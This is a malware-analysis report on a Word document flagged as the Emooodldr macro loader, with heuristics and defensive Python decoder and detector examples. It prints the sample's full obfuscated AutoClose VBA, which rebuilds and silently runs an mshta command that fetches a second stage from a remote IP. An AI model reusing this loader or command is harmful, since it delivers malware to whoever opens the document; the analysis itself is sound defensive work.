Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 e9c24d0a80b62274…

MALICIOUS

Office (OOXML)

Size: 54.3 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-10-30
MD5: 82d5bc54464e1d903cb806b9cc66faa7
SHA-1: f7a48cdfc7dccc4db70fc2d96058020ade558264
SHA-256: e9c24d0a80b622749a1b30f9d384a7cdd844310dbd3054898ec322cfabb65280
Risk score: 322

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word (OOXML) document whose VBA project carries an obfuscated loader. The auto-exec entry point is Sub AutoClose (reported under the Auto_Close heuristic), which runs when the document is closed and hands off to Sub gamo through Application.Run. gamo rebuilds two strings at run time by stripping 12-character junk tokens with a chain of Replace() calls: the COM ProgID 'WScript.Shell' and the command line 'mshta http://198.55.107.156/omm/stem.php?utma=honda'. It then passes them to CreateObject(diluvio).Run rigoroso, 0, i.e. a WScript.Shell Run with window style 0 (hidden). The document therefore does not download anything itself; it launches mshta.exe, which fetches and executes the HTA served by that URL as the second stage. That decoded URL is the only network indicator in the sample, and the literals 'WScript.Shell', 'http' and 'mshta' never appear in the macro source, which is why string-based signatures miss them while the structural heuristics below fire. ClamAV independently classifies the file as Doc.Malware.Emooodldr-6711604-0. One caveat on the header fields: the creation timestamp and authoring application are read from the package's own docProps metadata, which the author controls, so they are not reliable dating evidence.
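The Replace() decoder can be replayed statically from the extracted source, which recovers the ProgID and command line the macro hands to CreateObject(...).Run without executing any VBA. The Python below is an added example and is not part of this report or of the sample; it emulates only 'var = "..."' seeds and 'var = Replace(var, "token", "char")' steps. Its input is excerpted from the macros.bas preview further down this page; the function and pattern names are this example's own.

```python
"""
Static replay of the Replace()-based string decoder used by the macro.

Added example, not the report's code and not the sample's. It reads
extracted VBA source as text, replays every `var = "literal"` seed and
every `var = Replace(var, "token", "char")` step in program order, and
returns the decoded value of each variable that went through a Replace().
VBA_SOURCE is excerpted from the macros.bas preview on this page (decoder
lines, the sink, and one junk line to show it is ignored).
"""
from __future__ import annotations

import re

VBA_SOURCE = r'''
Sub gamo()
 AcbTvAZ = "y" & Trim("H")
 rigoroso = "wMzDPoxbFFLKcQPvNpHcnBfohIxOuoUCgMqEPHkTMSRgCqrFk hIxOuoUCgMqEPIxOuoUCgMqEPp://198.55.107.156/owMzDPoxbFFLKwMzDPoxbFFLK/cQPvNpHcnBfoIxOuoUCgMqEPENrARMrjKvHFwMzDPoxbFFLK.php?uIxOuoUCgMqEPwMzDPoxbFFLKHkTMSRgCqrFk=hondHkTMSRgCqrFk"
rigoroso = Replace(rigoroso, "wMzDPoxbFFLK", "m")
rigoroso = Replace(rigoroso, "HkTMSRgCqrFk", "a")
rigoroso = Replace(rigoroso, "cQPvNpHcnBfo", "s")
rigoroso = Replace(rigoroso, "IxOuoUCgMqEP", "t")
rigoroso = Replace(rigoroso, "ENrARMrjKvHF", "e")
rigoroso = Replace(rigoroso, "vUMvqygPMoRw", "l")
diluvio = "WScripRKKXIEWUfzFf.ShjIHGFrOKoigqZbIHqouHfgHzZbIHqouHfgHz"
diluvio = Replace(diluvio, "ovzxCUZxrrvP", "m")
diluvio = Replace(diluvio, "LvYdjIggqKpq", "a")
diluvio = Replace(diluvio, "DkiExzciANqM", "s")
diluvio = Replace(diluvio, "RKKXIEWUfzFf", "t")
diluvio = Replace(diluvio, "jIHGFrOKoigq", "e")
diluvio = Replace(diluvio, "ZbIHqouHfgHz", "l")
 CreateObject(diluvio).Run rigoroso, 0
End Sub

Sub AutoClose()
  Application.Run "gamo"
End Sub
'''

# var = "literal"   (a seed; lines with & concatenation do not match and are skipped)
SEED_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
# var = Replace(var, "junk token", "replacement")   (one decode step)
REPLACE_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Replace\(\s*(\w+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*$',
    re.IGNORECASE,
)
# CreateObject(var).Run var, windowstyle   (the execution sink)
SINK_RE = re.compile(r'CreateObject\(\s*(\w+)\s*\)\.Run\s+(\w+)\s*,\s*(\d+)', re.IGNORECASE)


def decode_replace_chains(vba_source: str) -> dict[str, str]:
    """Replay seeds and Replace() chains in program order.

    Returns {variable: decoded string} only for variables that were the
    target of at least one Replace(), so the junk assignments stay out.
    """
    values: dict[str, str] = {}
    decoded: set[str] = set()
    for line in vba_source.splitlines():
        m = SEED_RE.match(line)
        if m:
            values[m.group(1)] = m.group(2)
            continue
        m = REPLACE_RE.match(line)
        if m:
            dst, src, token, repl = m.groups()
            if src not in values:
                continue  # never seeded in this excerpt: skip rather than guess
            # VBA Replace() defaults to vbBinaryCompare (case-sensitive), which
            # str.replace() matches. A token that never occurs (the
            # "vUMvqygPMoRw" -> "l" step) is a no-op here, exactly as in VBA.
            values[dst] = values[src].replace(token, repl)
            decoded.add(dst)
    return {name: values[name] for name in decoded}


def resolve_sink(vba_source: str, decoded: dict[str, str]) -> dict[str, object] | None:
    """Map CreateObject(x).Run y, n onto the decoded ProgID and command line."""
    m = SINK_RE.search(vba_source)
    if not m:
        return None
    progid_var, cmd_var, style = m.groups()
    return {
        "progid": decoded.get(progid_var, progid_var),
        "command": decoded.get(cmd_var, cmd_var),
        "hidden": style == "0",  # WshShell.Run window style 0 = hidden window
    }


if __name__ == "__main__":
    strings = decode_replace_chains(VBA_SOURCE)
    for name, value in strings.items():
        print(f"{name} = {value!r}")
    print(resolve_sink(VBA_SOURCE, strings))
```

Run stand-alone it reports rigoroso = 'mshta http://198.55.107.156/omm/stem.php?utma=honda' and diluvio = 'WScript.Shell', with the sink resolved to a hidden WScript.Shell Run of that command. The replay is deliberately narrow (seeds and Replace() only); a decoder that mixes in Chr()/numeric arrays or hex strings needs those step types added, and anything it cannot match is left undecoded rather than guessed.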

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML [medium, 4 related findings] (OOXML_VBA)
    Document contains a VBA project (VBA macros present)
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    An auto-exec macro reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token removal via Replace) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the CreateObject/Shell/URL indicators out of the macro source, so string-based signatures do not see them.
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto-exec macro that runs when the document is closed (here Sub AutoClose, which calls Sub gamo via Application.Run)
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call (here on a variable holding the decoded ProgID rather than a literal)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction fails, where the visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. All 15 URLs below were found in document text (OOXML body / shared strings) and are XML namespace URIs of the package markup (the schemas.openxmlformats.org and schemas.microsoft.com/office namespaces Word declares in every document), so none of them is a network indicator. The one real network indicator is not in this list at all: it is the URL the macro rebuilds at run time from the Replace chain in macros.bas, http://198.55.107.156/omm/stem.php?utma=honda.
    In document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
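Taken together, the OLE_VBA_AUTOCLOSE, OLE_VBA_CREATEOBJ and OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER findings describe a structural shape rather than a string. The Python below is an added example, not the report's own detection logic: it scores decoded VBA source on that shape (auto-exec entry point, Replace()-based decoder, and a sink whose ProgID is a variable) while recording which literal indicators are absent, which is the reason a plain string signature has nothing to key on. The loader sample is an excerpt of the macros.bas preview below; the benign sample, the thresholds and all names are this example's assumptions.

```python
"""
Structural detector for the obfuscated auto-exec VBA loader shape.

Added example, not the report's detection code. Three observations:
  1. an auto-exec entry point (Word/Excel procedure names that run without
     a click);
  2. a Replace()-based decoder: the same variable rewritten by repeated
     x = Replace(x, "<long junk token>", "<short text>") calls;
  3. a COM instantiation whose ProgID is a variable, feeding Run/Exec.
LOADER_VBA is excerpted from the macros.bas preview on this page;
BENIGN_VBA is invented for contrast. Thresholds are assumptions.
"""
from __future__ import annotations

import re

LOADER_VBA = r'''
Sub gamo()
 rigoroso = "wMzDPoxbFFLKcQPvNpHcnBfohIxOuoUCgMqEPHkTMSRgCqrFk hIxOuoUCgMqEPIxOuoUCgMqEPp://198.55.107.156/owMzDPoxbFFLKwMzDPoxbFFLK/cQPvNpHcnBfoIxOuoUCgMqEPENrARMrjKvHFwMzDPoxbFFLK.php?uIxOuoUCgMqEPwMzDPoxbFFLKHkTMSRgCqrFk=hondHkTMSRgCqrFk"
rigoroso = Replace(rigoroso, "wMzDPoxbFFLK", "m")
rigoroso = Replace(rigoroso, "HkTMSRgCqrFk", "a")
rigoroso = Replace(rigoroso, "cQPvNpHcnBfo", "s")
rigoroso = Replace(rigoroso, "IxOuoUCgMqEP", "t")
diluvio = "WScripRKKXIEWUfzFf.ShjIHGFrOKoigqZbIHqouHfgHzZbIHqouHfgHz"
diluvio = Replace(diluvio, "RKKXIEWUfzFf", "t")
diluvio = Replace(diluvio, "jIHGFrOKoigq", "e")
diluvio = Replace(diluvio, "ZbIHqouHfgHz", "l")
 CreateObject(diluvio).Run rigoroso, 0
End Sub

Sub AutoClose()
  Application.Run "gamo"
End Sub
'''

# Constructed benign macro: auto-exec, one ordinary Replace(), no sink.
BENIGN_VBA = '''
Sub AutoOpen()
    ActiveDocument.Variables("LastOpened").Value = Now
    Dim t As String
    t = Replace(ActiveDocument.Name, ".docx", "")
End Sub
'''

# Auto-exec procedure names Word and Excel run without user interaction.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoClose|AutoExec|AutoNew|Auto_Open|Auto_Close|'
    r'Document_Open|Document_Close|Workbook_Open|Workbook_Close)\s*\(',
    re.IGNORECASE | re.MULTILINE,
)
# x = Replace(x, "<6+ char junk token>", "<0-2 char replacement>")
DECODER_RE = re.compile(
    r'(\w+)\s*=\s*Replace\(\s*\1\s*,\s*"[^"]{6,}"\s*,\s*"[^"]{0,2}"\s*\)',
    re.IGNORECASE,
)
# CreateObject(<variable>).Run / .Exec / .ShellExecute: ProgID not a literal
VAR_SINK_RE = re.compile(
    r'CreateObject\(\s*[A-Za-z_]\w*\s*\)\s*\.\s*(?:Run|Exec|ShellExecute)\b',
    re.IGNORECASE,
)
# Literals a string signature would key on; this loader contains none.
LITERAL_INDICATORS = ("wscript.shell", "shell.application", "http://", "https://",
                      "mshta", "powershell", "cmd.exe", "rundll32")
MIN_DECODE_STEPS = 3  # assumption: fewer Replace() calls is ordinary string handling


def analyse_vba(source: str) -> dict:
    """Return the evidence for each observation plus an overall verdict.

    Scored per module, not per procedure: here the auto-exec stub only
    calls gamo through Application.Run, and the decoder and sink live there.
    """
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)})
    steps: dict[str, int] = {}
    for var in DECODER_RE.findall(source):
        steps[var] = steps.get(var, 0) + 1
    decoder_vars = sorted(v for v, n in steps.items() if n >= MIN_DECODE_STEPS)
    var_sinks = [m.group(0) for m in VAR_SINK_RE.finditer(source)]
    lowered = source.lower()
    literals = [ind for ind in LITERAL_INDICATORS if ind in lowered]
    return {
        "autoexec": autoexec,
        "decoder_vars": decoder_vars,
        "var_sinks": var_sinks,
        "literal_indicators": literals,
        "verdict": bool(autoexec) and bool(decoder_vars) and bool(var_sinks),
    }


if __name__ == "__main__":
    print("loader:", analyse_vba(LOADER_VBA))
    print("benign:", analyse_vba(BENIGN_VBA))
```

The loader excerpt scores verdict True with AutoClose as the entry point, rigoroso and diluvio as decoder variables and an empty literal-indicator list; the benign macro has an auto-exec name but no decoder chain and no variable-ProgID sink, so it scores False. The empty literal list is the point of the OBFUSCATED_AUTOEXEC_LOADER heuristic: the strings a signature would look for only exist after the Replace chain has run.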

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2537 bytes
SHA-256: bd3a392e520add1fdcd85c5a018bf6c69561fc804b7790ff6b84fff0e82560f9
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub gamo()
 AcbTvAZ = "y" & Trim("H")
jqciixrGLNHf = "w" & "O" & Trim("A")
iyyRvyqT = 600 - 311 - 1134 - 249 - 1523 - 1012
YBJLZMXLTq = 1497 - 1854 - 860 - 1348 - 1094 - 307 - 1137

 rigoroso = "wMzDPoxbFFLKcQPvNpHcnBfohIxOuoUCgMqEPHkTMSRgCqrFk hIxOuoUCgMqEPIxOuoUCgMqEPp://198.55.107.156/owMzDPoxbFFLKwMzDPoxbFFLK/cQPvNpHcnBfoIxOuoUCgMqEPENrARMrjKvHFwMzDPoxbFFLK.php?uIxOuoUCgMqEPwMzDPoxbFFLKHkTMSRgCqrFk=hondHkTMSRgCqrFk"
rigoroso = Replace(rigoroso, "wMzDPoxbFFLK", "m")
BkdQwzwrr = 1389 - 1036 - 694 - 980
XwyAcQKGogyN = "d" & Trim("x") & "d"
wIXwHjKDfG = Trim("N") & Trim("C") & Trim("r") & "O"
rigoroso = Replace(rigoroso, "HkTMSRgCqrFk", "a")
bcDVLMFYL = 511 + 941 + 534 + 1751
rigoroso = Replace(rigoroso, "cQPvNpHcnBfo", "s")
rigoroso = Replace(rigoroso, "IxOuoUCgMqEP", "t")
HFOZxxJji = Trim("p") & Trim("c") & "L"
rigoroso = Replace(rigoroso, "ENrARMrjKvHF", "e")
rigoroso = Replace(rigoroso, "vUMvqygPMoRw", "l")

diluvio = "WScripRKKXIEWUfzFf.ShjIHGFrOKoigqZbIHqouHfgHzZbIHqouHfgHz"
diluvio = Replace(diluvio, "ovzxCUZxrrvP", "m")
JyXLfATD = 17 - 119 - 560 - 83
diluvio = Replace(diluvio, "LvYdjIggqKpq", "a")
ioHcydFoWDZ = "w" & "C"
cpfKYgT = 1079 + 1332 + 565 + 144 + 1624
GdviWPpq = 193 + 353
diluvio = Replace(diluvio, "DkiExzciANqM", "s")
VckTnLQD = 485 - 100 - 573 - 678 - 1625
wyWfyEHvJZJ = 747 + 469 + 1920 + 468
diluvio = Replace(diluvio, "RKKXIEWUfzFf", "t")
wfLfwDMCw = 1606 + 577 + 675 + 706 + 1162 + 1723 + 755
VbBMbuWjo = Trim("j") & Trim("n")
AYkHLgCXXHcn = 386 + 641 + 380 + 1375
diluvio = Replace(diluvio, "jIHGFrOKoigq", "e")
xoXbFqXZidcY = 1578 - 1579 - 1356 - 1152 - 396 - 1206
xFyovDN = 1851 - 1751 - 165
diluvio = Replace(diluvio, "ZbIHqouHfgHz", "l")


 CreateObject(diluvio).Run rigoroso, 0
 IwObLRbc = 615 - 936 - 1648 - 772 - 770 - 41
MXxVZOk = "I" & "x" & "X"
oLYRVQABRLT = 1664 + 190 + 832 + 1176 + 1746
VvcCoxzTIzBS = "g" & "P" & "n"

End Sub

Sub AutoClose()

  PXSwQpkgvyq = "N" & Trim("F") & "b"
DMgpFHV = Trim("T") & "f"

  Application.Run "gamo"
  KVycJGNTM = Trim("W") & "v" & Trim("M")
xHRrdRBJ = 1120 + 1750 + 864 + 234 + 73
YPuHyKjbZ = 1546 + 1346 + 1000
UFjLEGM = 1057 + 236 + 1977 + 177 + 174
jgAwxSBcfzp = "Q" & Trim("N")

End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes
SHA-256: 9ced9a25c9666be09cd600213f4dc05cc2fb9a502c343472cb4bf92edeb712e0
Detection (vbaProject_00.bin):
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely (per-artifact score for the binary VBA container; it does not reflect the Replace-chain obfuscation that is plain in the decoded macro source above)